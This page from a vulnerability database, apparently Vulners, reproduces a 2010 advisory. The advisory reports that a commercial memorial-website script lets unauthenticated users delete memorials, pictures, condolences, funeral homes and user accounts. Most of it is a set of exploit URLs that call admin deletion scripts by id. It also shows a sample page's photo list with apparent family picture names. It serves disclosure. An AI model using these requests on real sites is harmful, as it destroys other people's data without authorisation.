Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Memorial Web Site Script Arbitrary Deletion

🗓️ 24 Apr 2010 00:00:00Reported by Chip D3 Bi0sType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

Memorial Web Site Script Arbitrary Deletion vulnerability in Easy Scripts allows unauthorized users to delete memorials, pictures, condoleances, funeral homes, resell, and registered users

Code
`-----------------------------------------------------------------------------------------  
Memorial Web Site Script Multiple Arbitrary Delete Vuln  
-----------------------------------------------------------------------------------------  
  
Author : Chip D3 Bi0s  
Email : chipdebios[alt+64]gmail.com  
Where : From Remote  
Team : LatinHackTeam  
  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Author : Easy Scripts  
Price : $49  
Vendor : http://www.easy-scripts.net  
  
description Bug:  
~~~~~~~~~~~~~~~  
After seeing the bug v3n0m:  
http://www.exploit-db.com/exploits/12351  
  
I kept seeing some things,  
Discovery that could clear things published registered user,  
even delete registered users:)  
to do so, we must first get the id of registered users  
I'd have this form in some of its publications  
  
http://127.0.0.1/[path]/show_memorial.php?id=100  
  
  
then only get the id can delete all these things  
Memorials, Pictures, Multimple Pictures, Condoleances,  
Funeral homes, Resell & Delet Users  
  
All this is explained below:  
  
  
-------------------  
Delet Memorials  
http://127.0.0.1/[path]/admin/delete_mem.php?id=100  
  
------------------  
Delet Pictures  
http://127.0.0.1/[path]/admin/delete_pic.php?id=100  
  
  
  
in case of multiple images  
View Source on the pole is thus  
  
var preloadedimages=new Array();  
var timeoutId;  
  
photos[0]="pictures/1158372383_0_sub.JPG";  
names[0]="";  
photos[1]="pictures/1158372858_0_sub.JPG";  
names[1]="Mon&Dad";  
photos[2]="pictures/1158372975_0_sub.JPG";  
names[2]="Cementry";  
photos[3]="pictures/1158373106_0_sub.JPG";  
names[3]="Dad&Tommy";  
photos[4]="pictures/1158373106_1_sub.JPG";  
names[4]="Dad&Steve";  
photos[5]="pictures/1158373335_0_sub.JPG";  
names[5]="";  
photos[6]="pictures/1158375471_0_sub.JPG";  
names[6]="Dad7Minoo&Homa";  
  
Delet Multimple Pictures  
  
http://127.0.0.1/[path]/admin/del_im.php?id=100&name=1158375471_0_sub.JPG  
-------------------  
  
Delet Condoleances  
http://127.0.0.1/[path]/dmin/delete_con.php?id=100  
  
-------------  
Delet Funeral homes  
http://127.0.0.1/[path]/admin/delete_fh.php?id=100  
  
  
--------  
Delet Resell  
http://127.0.0.1/[path]/admin/delete_resell.php?id=100  
  
---------  
Delet Users  
http://127.0.0.1/[path]/admin/delete_user.php?id=100  
  
  
  
+++++++++++++++++++++++++++++++++++++++  
#[!] Produced in South America  
+++++++++++++++++++++++++++++++++++++++  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Apr 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
easy scripts; arbitrary deletion; unauthorized access; memorial deletion; picture deletion; condoleances deletion; funeral homes deletion; resell deletion; registered users deletion; latinhackteam; south america
20